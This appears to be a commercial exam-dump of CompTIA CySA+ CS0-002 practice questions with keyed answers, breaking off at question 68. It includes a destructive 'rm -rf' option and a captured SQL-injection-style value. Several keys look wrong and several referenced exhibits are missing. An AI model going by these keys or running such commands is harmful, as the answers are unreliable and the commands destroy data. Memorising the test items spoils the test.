Pass4Lead

100% Real IT Exam Q&As.

Easily Pass with a High Score.

Copyright © Pass4Lead.com, All Rights Reserved.

All our exam practice questions and answers are only for our product buyers to get prepared for their
coming certification examinations. Any unauthorized sharing is forbidden. It may cause the suspending
of ones account, membership and product update if there is a violation of this rule.
Congratulations! You can visit www.Pass4Lead.com
and use the Coupon code: Pass4Lead to enjoy 20%
off on Next Order.
Vendor: CompTIA

Exam Code: CS0-002

Exam Name: CompTIA Cybersecurity Analyst (CySA+)

Q&As: 186 (There are 2 parts in the dump, 186

questions in total.)
Exam A

QUESTION 1
An analyst is performing penetration testing and vulnerability assessment activities against a new vehicle
automation platform.
Which of the following is MOST likely an attack vector that is being utilized as part of the testing and
assessment?

A. FaaS
B. RTOS
C. SoC
D. GPS
E. CAN bus

Correct Answer: E
Explanation

Explanation/Reference:

QUESTION 2
An information security analyst observes anomalous behavior on the SCADA devices in a power plant.
This behavior results in the industrial generators overheating and destabilizing the power supply. Which of
the following would BEST identify potential indicators of compromise?

A. Use Burp Suite to capture packets to the SCADA device's IP.

B. Use tcpdump to capture packets from the SCADA device IP.
C. Use Wireshark to capture packets between SCADA devices and the management system.
D. Use Nmap to capture packets from the management system to the SCADA devices.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 3
Which of the following would MOST likely be included in the incident response procedure after a security
breach of customer PII?

A. Human resources
B. Public relations
C. Marketing
D. Internal network operations center

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 4
An analyst is working with a network engineer to resolve a vulnerability that was found in a piece of legacy
hardware, which is critical to the operation of the organization's production line. The legacy hardware does
not have third-party support, and the OEM manufacturer of the controller is no longer in operation. The
analyst documents the activities and verifies these actions prevent remote exploitation of the vulnerability.
Which of the following would be the MOST appropriate to remediate the controller?

A. Segment the network to constrain access to administrative interfaces.

B. Replace the equipment that has third-party support.
C. Remove the legacy hardware from the network.
D. Install an IDS on the network between the switch and the legacy equipment.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 5
A small electronics company decides to use a contractor to assist with the development of a new FPGA-
based device. Several of the development phases will occur off-site at the contractor's labs. Which of the
following is the main concern a security analyst should have with this arrangement?

A. Making multiple trips between development sites increases the chance of physical damage to the
FPGAs.
B. Moving the FPGAs between development sites will lessen the time that is available for security testing.
C. Development phases occurring at multiple sites may produce change management issues.
D. FPGA applications are easily cloned, increasing the possibility of intellectual property theft.

Correct Answer: B
Explanation

Explanation/Reference:
Reference: https://www.eetimes.com/how-to-protect-intellectual-property-in-fpgas-devices-part-1/#

QUESTION 6
A security analyst is trying to determine if a host is active on a network. The analyst first attempts the
following:

The analyst runs the following command next:

Which of the following would explain the difference in results?

A. ICMP is being blocked by a firewall.

B. The routing tables for ping and hping3 were different.
C. The original ping command needed root permission to execute.
D. hping3 is returning a false positive.

Correct Answer: A
Explanation

Explanation/Reference:
QUESTION 7
A cybersecurity analyst is contributing to a team hunt on an organization's endpoints.
Which of the following should the analyst do FIRST?

A. Write detection logic.

B. Establish a hypothesis.
C. Profile the threat actors and activities.
D. Perform a process analysis.

Correct Answer: C
Explanation

Explanation/Reference:
Reference: https://www.cybereason.com/blog/blog-the-eight-steps-to-threat-hunting

QUESTION 8
A security analyst received a SIEM alert regarding high levels of memory consumption for a critical system.
After several attempts to remediate the issue, the system went down. A root cause analysis revealed a bad
actor forced the application to not reclaim memory. This caused the system to be depleted of resources.
Which of the following BEST describes this attack?

A. Injection attack
B. Memory corruption
C. Denial of service
D. Array attack

Correct Answer: B
Explanation

Explanation/Reference:
Reference: https://economictimes.indiatimes.com/definition/memory-corruption

QUESTION 9
Which of the following software security best practices would prevent an attacker from being able to run
arbitrary SQL commands within a web application? (Choose two.)

A. Parameterized queries
B. Session management
C. Input validation
D. Output encoding
E. Data protection
F. Authentication

Correct Answer: AC
Explanation

Explanation/Reference:
Reference: https://www.ptsecurity.com/ww-en/analytics/knowledge-base/how-to-prevent-sql-injection-
attacks/

QUESTION 10
A cyber-incident response analyst is investigating a suspected cryptocurrency miner on a company's
server.
Which of the following is the FIRST step the analyst should take?

A. Create a full disk image of the server's hard drive to look for the file containing the malware.
B. Run a manual antivirus scan on the machine to look for known malicious software.
C. Take a memory snapshot of the machine to capture volatile information stored in memory.
D. Start packet capturing to look for traffic that could be indicative of command and control from the miner.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 11
An information security analyst is compiling data from a recent penetration test and reviews the following
output:

The analyst wants to obtain more information about the web-based services that are running on the target.
Which of the following commands would MOST likely provide the needed information?

A. ping -t 10.79.95.173.rdns.datacenters.com
B. telnet 10.79.95.173 443
C. ftpd 10.79.95.173.rdns.datacenters.com 443
D. tracert 10.79.95.173

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 12
A compliance officer of a large organization has reviewed the firm's vendor management program but has
discovered there are no controls defined to evaluate third-party risk or hardware source authenticity. The
compliance officer wants to gain some level of assurance on a recurring basis regarding the
implementation of controls by third parties. Which of the following would BEST satisfy the objectives
defined by the compliance officer? (Choose two.)

A. Executing vendor compliance assessments against the organization's security controls

B. Executing NDAs prior to sharing critical data with third parties
C. Soliciting third-party audit reports on an annual basis
D. Maintaining and reviewing the organizational risk assessment on a quarterly basis
E. Completing a business impact assessment for all critical service providers
F. Utilizing DLP capabilities at both the endpoint and perimeter levels

Correct Answer: AC
Explanation

Explanation/Reference:
QUESTION 13
An audit has revealed an organization is utilizing a large number of servers that are running unsupported
operating systems.
As part of the management response phase of the audit, which of the following would BEST demonstrate
senior management is appropriately aware of and addressing the issue?

A. Copies of prior audits that did not identify the servers as an issue
B. Project plans relating to the replacement of the servers that were approved by management
C. Minutes from meetings in which risk assessment activities addressing the servers were discussed
D. ACLs from perimeter firewalls showing blocked access to the servers
E. Copies of change orders relating to the vulnerable servers

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 14
A security analyst is reviewing packet captures from a system that was compromised. The system was
already isolated from the network, but it did have network access for a few hours after being compromised.
When viewing the capture in a packet analyzer, the analyst sees the following:

Which of the following can the analyst conclude?

A. Malware is attempting to beacon to 128.50.100.3.

B. The system is running a DoS attack against ajgidwle.com.
C. The system is scanning ajgidwle.com for PII.
D. Data is being exfiltrated over DNS.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 15
It is important to parameterize queries to prevent:

A. the execution of unauthorized actions against a database.

B. a memory overflow that executes code with elevated privileges.
C. the establishment of a web shell that would allow unauthorized access.
D. the queries from using an outdated library with security vulnerabilities.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 16
A security analyst reviews the following aggregated output from an Nmap scan and the border firewall
ACL:
Which of the following should the analyst reconfigure to BEST reduce organizational risk while maintaining
current functionality?

A. PC1
B. PC2
C. Server1
D. Server2
E. Firewall

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 17
During an investigation, a security analyst determines suspicious activity occurred during the night shift
over the weekend. Further investigation reveals the activity was initiated from an internal IP going to an
external website.
Which of the following would be the MOST appropriate recommendation to prevent the activity from
happening in the future?

A. An IPS signature modification for the specific IP addresses

B. An IDS signature modification for the specific IP addresses
C. A firewall rule that will block port 80 traffic
D. A firewall rule that will block traffic from the specific IP addresses

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 18
A security analyst has received reports of very slow, intermittent access to a public-facing corporate
server. Suspecting the system may be compromised, the analyst runs the following commands:
Based on the output from the above commands, which of the following should the analyst do NEXT to
further the investigation?

A. Run crontab -r; rm -rf /tmp/.t to remove and disable the malware on the system.
B. Examine the server logs for further indicators of compromise of a web application.
C. Run kill -9 1325 to bring the load average down so the server is usable again.
D. Perform a binary analysis on the /tmp/.t/t file, as it is likely to be a rogue SSHD server.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 19
A Chief Information Security Officer (CISO) wants to upgrade an organization's security posture by
improving proactive activities associated with attacks from internal and external threats. Which of the
following is the MOST proactive tool or technique that feeds incident response capabilities?

A. Development of a hypothesis as part of threat hunting

B. Log correlation, monitoring, and automated reporting through a SIEM platform
C. Continuous compliance monitoring using SCAP dashboards
D. Quarterly vulnerability scanning using credentialed scans

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 20
While planning segmentation for an ICS environment, a security engineer determines IT resources will
need access to devices within the ICS environment without compromising security.

To provide the MOST secure access model in this scenario, the jumpbox should be __________.

A. placed in an isolated network segment, authenticated on the IT side, and forwarded into the ICS
network.
B. placed on the ICS network with a static firewall rule that allows IT network resources to authenticate.
C. bridged between the IT and operational technology networks to allow authenticated access.
D. placed on the IT side of the network, authenticated, and tunneled into the ICS environment.

Correct Answer: D
Explanation

Explanation/Reference:
QUESTION 21
A development team uses open-source software and follows an Agile methodology with two-week sprints.
Last month, the security team filed a bug for an insecure version of a common library. The DevOps team
updated the library on the server, and then the security team rescanned the server to verify it was no
longer vulnerable. This month, the security team found the same vulnerability on the server. Which of the
following should be done to correct the cause of the vulnerability?

A. Deploy a WAF in front of the application.

B. Implement a software repository management tool.
C. Install a HIPS on the server.
D. Instruct the developers to use input validation in the code.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 22
A security analyst is reviewing the logs from an internal chat server. The chat.log file is too large to review
manually, so the analyst wants to create a shorter log file that only includes lines associated with a user
demonstrating anomalous activity. Below is a snippet of the log:

Which of the following commands would work BEST to achieve the desired result?

A. grep -v chatter14 chat.log

B. grep -i pythonfun chat.log
C. grep -i javashark chat.log
D. grep -v javashark chat.log
E. grep -v pythonfun chat.log
F. grep -i chatter14 chat.log

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 23
An analyst is participating in the solution analysis process for a cloud-hosted SIEM platform to centralize
log monitoring and alerting capabilities in the SOC.

Which of the following is the BEST approach for supply chain assessment when selecting a vendor?

A. Gather information from providers, including datacenter specifications and copies of audit reports.
B. Identify SLA requirements for monitoring and logging.
C. Consult with senior management for recommendations.
D. Perform a proof of concept to identify possible solutions.
Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 24
A security technician is testing a solution that will prevent outside entities from spoofing the company's
email domain, which is comptia.org. The testing is successful, and the security technician is prepared to
fully implement the solution.
Which of the following actions should the technician take to accomplish this task?

A. Add TXT @ "v=spf1 mx include:_spf.comptia.org -all" to the DNS record.

B. Add TXT @ "v=spf1 mx include:_spf.comptia.org -all" to the email server.
C. Add TXT @ "v=spf1 mx include:_spf.comptia.org +all" to the domain controller.
D. Add TXT @ "v=spf1 mx include:_spf.comptia.org +all" to the web server.

Correct Answer: A
Explanation

Explanation/Reference:
Reference: https://blog.finjan.com/email-spoofing/

QUESTION 25
A security analyst on the threat-hunting team has developed a list of unneeded, benign services that are
currently running as part of the standard OS deployment for workstations. The analyst will provide this list
to the operations team to create a policy that will automatically disable the services for all workstations in
the organization.
Which of the following BEST describes the security analyst's goal?

A. To create a system baseline

B. To reduce the attack surface
C. To optimize system performance
D. To improve malware detection

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 26
Which of the following roles is ultimately responsible for determining the classification levels assigned to
specific data sets?

A. Data custodian
B. Data owner
C. Data processor
D. Senior management

Correct Answer: B
Explanation

Explanation/Reference:
Reference: https://www.pearsonitcertification.com/articles/article.aspx?p=2731933&seqNum=3

QUESTION 27
A security analyst suspects a malware infection was caused by a user who downloaded malware after
clicking http://<malwaresource>/a.php in a phishing email.
To prevent other computers from being infected by the same malware variation, the analyst should create
a rule on the __________.

A. email server that automatically deletes attached executables.

B. IDS to match the malware sample.
C. proxy to block all connections to <malwaresource>.
D. firewall to block connection attempts to dynamic DNS hosts.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 28
An information security analyst is reviewing backup data sets as part of a project focused on eliminating
archival data sets.
Which of the following should be considered FIRST prior to disposing of the electronic data?

A. Sanitization policy
B. Data sovereignty
C. Encryption policy
D. Retention standards

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 29
A security analyst is evaluating two vulnerability management tools for possible use in an organization.
The analyst set up each of the tools according to the respective vendor's instructions and generated a
report of vulnerabilities that ran against the same target server.
Tool A reported the following:

Tool B reported the following:

Which of the following BEST describes the method used by each tool? (Choose two.)

A. Tool A is agent based.

B. Tool A used fuzzing logic to test vulnerabilities.
C. Tool A is unauthenticated.
D. Tool B utilized machine learning technology.
E. Tool B is agent based.
F. Tool B is unauthenticated.

Correct Answer: CE
Explanation
Explanation/Reference:

QUESTION 30
A security analyst received an alert from the SIEM indicating numerous login attempts from users outside
their usual geographic zones, all of which were initiated through the web-based mail server. The logs
indicate all domain accounts experienced two login attempts during the same time frame. Which of the
following is the MOST likely cause of this issue?

A. A password-spraying attack was performed against the organization.

B. A DDoS attack was performed against the organization.
C. This was normal shift work activity; the SIEM's AI is learning.
D. A credentialed external vulnerability scan was performed.

Correct Answer: A
Explanation

Explanation/Reference:
Reference: https://doubleoctopus.com/security-wiki/threats-and-tools/password-spraying/

QUESTION 31
During an investigation, a security analyst identified machines that are infected with malware the antivirus
was unable to detect.
Which of the following is the BEST place to acquire evidence to perform data carving?

A. The system memory

B. The hard drive
C. Network packets
D. The Windows Registry

Correct Answer: A
Explanation

Explanation/Reference:
Reference:
https://resources.infosecinstitute.com/memory-forensics/#gref https://www.computerhope.com/jargon/d/
data-carving.htm

QUESTION 32
A cybersecurity analyst has access to several threat feeds and wants to organize them while
simultaneously comparing intelligence against network traffic. Which of the following would BEST
accomplish this goal?

A. Continuous integration and deployment

B. Automation and orchestration
C. Static and dynamic analysis
D. Information sharing and analysis

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 33
A storage area network (SAN) was inadvertently powered off while power maintenance was being
performed in a datacenter. None of the systems should have lost all power during the maintenance. Upon
review, it is discovered that a SAN administrator moved a power plug when testing the SAN's fault
notification features.
Which of the following should be done to prevent this issue from reoccurring?

A. Ensure both power supplies on the SAN are serviced by separate circuits, so that if one circuit goes
down, the other remains powered.
B. Install additional batteries in the SAN power supplies with enough capacity to keep the system
powered on during maintenance operations.
C. Ensure power configuration is covered in the datacenter change management policy and have the SAN
administrator review this policy.
D. Install a third power supply in the SAN so loss of any power intuit does not result in the SAN completely
powering off.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 34
A security analyst is providing a risk assessment for a medical device that will be installed on the corporate
network. During the assessment, the analyst discovers the device has an embedded operating system that
will be at the end of its life in two years. Due to the criticality of the device, the security committee makes a
risk- based policy decision to review and enforce the vendor upgrade before the end of life is reached.
Which of the following risk actions has the security committee taken?

A. Risk exception
B. Risk avoidance
C. Risk tolerance
D. Risk acceptance

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 35
During a cyber incident, which of the following is the BEST course of action?

A. Switch to using a pre-approved, secure, third-party communication system.

B. Keep the entire company informed to ensure transparency and integrity during the incident.
C. Restrict customer communication until the severity of the breach is confirmed.
D. Limit communications to pre-authorized parties to ensure response efforts remain confidential.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 36
Which of the following BEST describes the process by which code is developed, tested, and deployed in
small batches?

A. Agile
B. Waterfall
C. SDLC
D. Dynamic code analysis

Correct Answer: A
Explanation

Explanation/Reference:
Reference: https://www.cleverism.com/software-development-life-cycle-sdlc-methodologies/

QUESTION 37
Which of the following types of policies is used to regulate data storage on the network?

A. Password
B. Acceptable use
C. Account management
D. Retention

Correct Answer: D
Explanation

Explanation/Reference:
Reference: http://www.css.edu/administration/information-technologies/computing-policies/computer-and-
network-policies.html

QUESTION 38
A security team wants to make SaaS solutions accessible from only the corporate campus. Which of the
following would BEST accomplish this goal?

A. Geofencing
B. IP restrictions
C. Reverse proxy
D. Single sign-on

Correct Answer: A
Explanation

Explanation/Reference:
Reference: https://bluedot.io/library/what-is-geofencing/

QUESTION 39
Data spillage occurred when an employee accidentally emailed a sensitive file to an external recipient.
Which of the following controls would have MOST likely prevented this incident?

A. SSO
B. DLP
C. WAF
D. VDI

Correct Answer: B
Explanation

Explanation/Reference:
Reference: https://greenlightcorp.com/blog/cyber-security-solutions-data-spillage-and-how-to-create-an-
after-incident-to-do-list/

QUESTION 40
A security analyst has received information from a third-party intelligence-sharing resource that indicates
employee accounts were breached.
Which of the following is the NEXT step the analyst should take to address the issue?

A. Audit access permissions for all employees to ensure least privilege.

B. Force a password reset for the impacted employees and revoke any tokens.
C. Configure SSO to prevent passwords from going outside the local network.
D. Set up privileged access management to ensure auditing is enabled.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 41
A security analyst is building a malware analysis lab. The analyst wants to ensure malicious applications
are not capable of escaping the virtual machines and pivoting to other networks. To BEST mitigate this
risk, the analyst should use __________.

A. an 802.11ac wireless bridge to create an air gap.

B. a managed switch to segment the lab into a separate VLAN.
C. a firewall to isolate the lab network from all other networks.
D. an unmanaged switch to segment the environments from one another.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 42
A security analyst for a large financial institution is creating a threat model for a specific threat actor that is
likely targeting an organization's financial assets. Which of the following is the BEST example of the level
of sophistication this threat actor is using?

A. Social media accounts attributed to the threat actor

B. Custom malware attributed to the threat actor from prior attacks
C. Email addresses and phone numbers tied to the threat actor
D. Network assets used in previous attacks attributed to the threat actor
E. IP addresses used by the threat actor for command and control

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 43
Bootloader malware was recently discovered on several company workstations. All the workstations run
Windows and are current models with UEFI capability. Which of the following UEFI settings is the MOST
likely cause of the infections?

A. Compatibility mode
B. Secure boot mode
C. Native mode
D. Fast boot mode

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 44
The security team at a large corporation is helping the payment-processing team to prepare for a
regulatory compliance audit and meet the following objectives:
Reduce the number of potential findings by the auditors. Limit the scope of the audit to only devices used
by the payment-processing team for activities directly impacted by the regulations. Prevent the external-
facing web infrastructure used by other teams from coming into scope. Limit the amount of exposure the
company will face if the systems used by the payment-processing team are compromised.
Which of the following would be the MOST effective way for the security team to meet these objectives?

A. Limit the permissions to prevent other employees from accessing data owned by the business unit.
B. Segment the servers and systems used by the business unit from the rest of the network.
C. Deploy patches to all servers and workstations across the entire organization.
D. Implement full-disk encryption on the laptops used by employees of the payment-processing team.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 45
During routine monitoring, a security analyst discovers several suspicious websites that are
communicating with a local host. The analyst queries for IP 192.168.50.2 for a 24-hour period:

To further investigate, the analyst should request PCAP for SRC 192.168.50.2 and __________.

A. DST 138.10.2.5.
B. DST 138.10.25.5.
C. DST 172.10.3.5.
D. DST 172.10.45.5.
E. DST 175.35.20.5.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 46
For machine learning to be applied effectively toward security analysis automation, it requires
__________.
A. relevant training data.
B. a threat feed API.
C. a multicore, multiprocessor system.
D. anomalous traffic signatures.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 47
A large amount of confidential data was leaked during a recent security breach. As part of a forensic
investigation, the security team needs to identify the various types of traffic that were captured between
two
compromised devices.
Which of the following should be used to identify the traffic?

A. Carving
B. Disk imaging
C. Packet analysis
D. Memory dump
E. Hashing

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 48
Which of the following sets of attributes BEST illustrates the characteristics of an insider threat from a
security perspective?

A. Unauthorized, unintentional, benign

B. Unauthorized, intentional, malicious
C. Authorized, intentional, malicious
D. Authorized, unintentional, benign

Correct Answer: C
Explanation

Explanation/Reference:
Reference: https://www.sciencedirect.com/topics/computer-science/insider-attack

QUESTION 49
A security analyst has observed several incidents within an organization that are affecting one specific
piece of hardware on the network. Further investigation reveals the equipment vendor previously released
a patch.
Which of the following is the MOST appropriate threat classification for these incidents?

A. Known threat
B. Zero day
C. Unknown threat
D. Advanced persistent threat

Correct Answer: B
Explanation
Explanation/Reference:

QUESTION 50
An incident responder successfully acquired application binaries off a mobile device for later forensic
analysis.
Which of the following should the analyst do NEXT?

A. Decompile each binary to derive the source code.

B. Perform a factory reset on the affected mobile device.
C. Compute SHA-256 hashes for each binary.
D. Encrypt the binaries using an authenticated AES-256 mode of operation.
E. Inspect the permissions manifests within each application.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 51
A security analyst needs to reduce the overall attack surface. Which of the following infrastructure changes
should the analyst recommend?

A. Implement a honeypot.
B. Air gap sensitive systems.
C. Increase the network segmentation.
D. Implement a cloud-based architecture.

Correct Answer: C
Explanation

Explanation/Reference:
Reference: https://www.securitymagazine.com/articles/89283-ways-to-reduce-your-attack-surface

QUESTION 52
A security analyst is reviewing the following log from an email security service.

Which of the following BEST describes the reason why the email was blocked?

A. The To address is invalid.

B. The email originated from the www.spamfilter.org URL.
C. The IP address and the remote server name are the same.
D. The IP address was blacklisted.
E. The From address is invalid.

Correct Answer: D
Explanation
Explanation/Reference:
Reference: https://www.webopedia.com/TERM/R/RBL.html

QUESTION 53
A user's computer has been running slowly when the user tries to access web pages. A security analyst
runs the command netstat -aon from the command line and receives the following output:

Which of the following lines indicates the computer may be compromised?

A. Line 1
B. Line 2
C. Line 3
D. Line 4
E. Line 5
F. Line 6

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 54
As part of an exercise set up by the information security officer, the IT staff must move some of the
network systems to an off-site facility and redeploy them for testing. All staff members must ensure their
respective systems can power back up and match their gold image. If they find any inconsistencies, they
must formally document the information.
Which of the following BEST describes this test?

A. Walk through
B. Full interruption
C. Simulation
D. Parallel

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 55
A security analyst is reviewing a web application. If an unauthenticated user tries to access a page in the
application, the user is redirected to the login page. After successful authentication, the user is then
redirected
back to the original page. Some users have reported receiving phishing emails with a link that takes them
to the application login page but then redirects to a fake login page after successful authentication. Which
of the following will remediate this software vulnerability?

A. Enforce unique session IDs for the application.

B. Deploy a WAF in front of the web application.
C. Check for and enforce the proper domain for the redirect.
D. Use a parameterized query to check the credentials.
E. Implement email filtering with anti-phishing protection.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 56
A Chief Information Security Officer (CISO) is concerned the development team, which consists of
contractors, has too much access to customer data
Developers use personal workstations, giving the company little to no visibility into the development
activities.
Which of the following would be BEST to implement to alleviate the CISO's concern?

A. DLP
B. Encryption
C. Test data
D. NDA

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 57
A company was recently awarded several large government contracts and wants to determine its current
risk from one specific APT.
Which of the following threat modeling methodologies would be the MOST appropriate to use during this
analysis?

A. Attack vectors
B. Adversary capability
C. Diamond Model of Intrusion Analysis
D. Kill chain
E. Total attack surface

Correct Answer: B
Explanation

Explanation/Reference:
Reference: https://www.secureworks.com/blog/advanced-persistent-threats-apt-b

QUESTION 58
A security analyst is reviewing vulnerability scan results and notices new workstations are being flagged as
having outdated antivirus signatures. The analyst observes the following plugin output:
Antivirus is installed on the remote host:
Installation path: C:\Program Files\AVProduct\Win32\
Product Engine: 14.12.101
Engine Version: 3.5.71
Scanner does not currently have information about AVProduct version 3.5.71. It may no longer be
supported.
The engine version is out of date. The oldest supported version from the vendor is 4.2.11. The analyst
uses the vendor's website to confirm the oldest supported version is correct.

Which of the following BEST describes the situation?

A. This is a false positive, and the scanning plugin needs to be updated by the vendor.
B. This is a true negative, and the new computers have the correct version of the software.
C. This is a true positive, and the new computers were imaged with an old version of the software.
D. This is a false negative, and the new computers need to be updated by the desktop team.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 59
A SIEM solution alerts a security analyst of a high number of login attempts against the company's
webmail portal. The analyst determines the login attempts used credentials from a past data breach.
Which of the following is the BEST mitigation to prevent unauthorized access?

A. Single sign-on
B. Mandatory access control
C. Multifactor authentication
D. Federation
E. Privileged access management

Correct Answer: E
Explanation

Explanation/Reference:

QUESTION 60
A product manager is working with an analyst to design a new application that will perform as a data
analytics platform and will be accessible via a web browser. The product manager suggests using a PaaS
provider to host the application.
Which of the following is a security concern when using a PaaS solution?

A. The use of infrastructure-as-code capabilities leads to an increased attack surface.

B. Patching the underlying application server becomes the responsibility of the client.
C. The application is unable to use encryption at the database level.
D. Insecure application programming interfaces can lead to data compromise.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 61
Because some clients have reported unauthorized activity on their accounts, a security analyst is
reviewing network packet captures from the company's API server. A portion of a capture file is shown
below:
POST /services/v1_0/Public/Members.svc/soap <s:Envelope+xmlns:s="http://schemas.s/soap/
envelope/"><s:Body><GetIPLocation+xmlns="http://tempuri.org/"> <request+xmlns:a="http://
schemas.somesite.org"+xmlns:i="http://www.w3.org/2001/XMLSchema-instance"></:Body></
s:Envelope> 192.168.1.22 - - api.somesite.com 200 0 1006 1001 0 192.168.1.22

POST /services/v1_0/Public/Members.svc/soap <<a:Password>Password123</

a:Password><a:ResetPasswordToken+i:nil="true"/> <a:ShouldImpersonatedAuthenticationBePopulated
+i:nil="true"/ ><a:Username>[email protected]</a:Username></request></Login></
s:Body></s:Envelope> 192.168.5.66 - - api.somesite.com 200 0 11558 1712 2024 192.168.4.89

POST /services/v1_0/Public/Members.svc/soap <s:Envelope+xmlns:s="http://schemas.xmlsoap.org/soap/

envelope/"><s:Body><GetIPLocation+xmlns="http://tempuri.org/"><a:IPAddress>516.7.446.605</
a:IPAddress><a:ZipCode+i:nil="true"/></request></GetIPLocation></s:Body></s:Envelope> 192.168.1.22
- - api.somesite.com 200 0 1003 1011 307 192.168.1.22

POST /services/v1_0/Public/Members.svc/soap <s:Envelope+xmlns:s="http://schemas.xmlsoap.org/soap/

envelope/"><s:Body><IsLoggedIn+xmlns="http://tempuri.org/"> <request +xmlns:a="http://
schemas.datacontract.org/2004/07/somesite.web+xmlns:i="http://www.w3.org/2001/
XMLSchemainstance"><a:Authentication>

<a:ApiToken>kmL4krg2CwwWBan5BReGv5Djb7syxXTNKcWFuSjd</
a:ApiToken><a:ImpersonateUserId>0</a:ImpersonateUserId><a:LocationId>161222</a:LocationId>
<a:NetworkId>4</a:NetworkId><a:ProviderId>''1=1</a:ProviderId><a:UserId>13026046</a:UserId></
a:Authentication></request></IsLoggedIn></s:Body></s:Envelope> 192.168.5.66 - - api.somesite.com 200
0 1378 1209 48 192.168.4.89

Which of the following MOST likely explains how the clients' accounts were compromised?

A. The clients' authentication tokens were impersonated and replayed.

B. The clients' usernames and passwords were transmitted in cleartext.
C. An XSS scripting attack was carried out on the server.
D. A SQL injection attack was carried out on the server.

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 62
A monthly job to install approved vendor software updates and hot fixes recently stopped working. The
security team performed a vulnerability scan, which identified several hosts as having some critical OS
vulnerabilities, as referenced in the common vulnerabilities and exposures (CVE) database.

Which of the following should the security team do NEXT to resolve the critical findings in the most
effective manner? (Choose two.)

A. Patch the required hosts with the correct updates and hot fixes, and rescan them for vulnerabilities.
B. Remove the servers reported to have high and medium vulnerabilities.
C. Tag the computers with critical findings as a business risk acceptance.
D. Manually patch the computers on the network, as recommended on the CVE website.
E. Harden the hosts on the network, as recommended by the NIST framework.
F. Resolve the monthly job issues and test them before applying them to the production network.

Correct Answer: CE
Explanation

Explanation/Reference:

QUESTION 63
A development team is testing a new application release. The team needs to import existing client PHI
data records from the production environment to the test environment to test accuracy and functionality.
Which of the following would BEST protect the sensitivity of this data while still allowing the team to
perform the testing?

A. Deidentification
B. Encoding
C. Encryption
D. Watermarking
Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 64
A network attack that is exploiting a vulnerability in the SNMP is detected. Which of the following should
the cybersecurity analyst do FIRST?

A. Apply the required patches to remediate the vulnerability.

B. Escalate the incident to senior management for guidance.
C. Disable all privileged user accounts on the network.
D. Temporarily block the attacking IP address.

Correct Answer: A
Explanation

Explanation/Reference:
Reference: https://beyondsecurity.com/scan-pentest-network-vulnerabilities-snmp-protocol-version-
detection.html

QUESTION 65
An organization is moving its infrastructure to the cloud in an effort to meet the budget and reduce staffing
requirements. The organization has three environments: development, testing, and production. These
environments have interdependencies but must remain relatively segmented. Which of the following
methods would BEST secure the company's infrastructure and be the simplest to manage and maintain?

A. Create three separate cloud accounts for each environment. Configure account peering and security
rules to allow access to and from each environment.
B. Create one cloud account with one VPC for all environments. Purchase a virtual firewall and create
granular security rules.
C. Create one cloud account and three separate VPCs for each environment. Create security rules to
allow access to and from each environment.
D. Create three separate cloud accounts for each environment and a single core account for network
services. Route all traffic through the core account.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 66
A pharmaceutical company's marketing team wants to send out notifications about new products to alert
users of recalls and newly discovered adverse drug reactions. The team plans to use the names and
mailing addresses that users have provided.
Which of the following data privacy standards does this violate?

A. Purpose limitation
B. Sovereignty
C. Data minimization
D. Retention

Correct Answer: A
Explanation

Explanation/Reference:
Reference: http://www.isitethical.eu/portfolio-item/purpose-limitation/
QUESTION 67
A user receives a potentially malicious email that contains spelling errors and a PDF document. A security
analyst reviews the email and decides to download the attachment to a Linux sandbox for review. Which of
the following commands would MOST likely indicate if the email is malicious?

A. sha256sum ~/Desktop/file.pdf
B. file ~/Desktop/file.pdf
C. strings ~/Desktop/file.pdf | grep "<script"
D. cat < ~/Desktop/file.pdf | grep -i .exe

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 68
A development team signed a contract that requires access to an on-premises physical server. Access
must be restricted to authorized users only and cannot be connected to the Internet. Which of the following
solutions would meet this requirement?

A. Establish a hosted SSO.

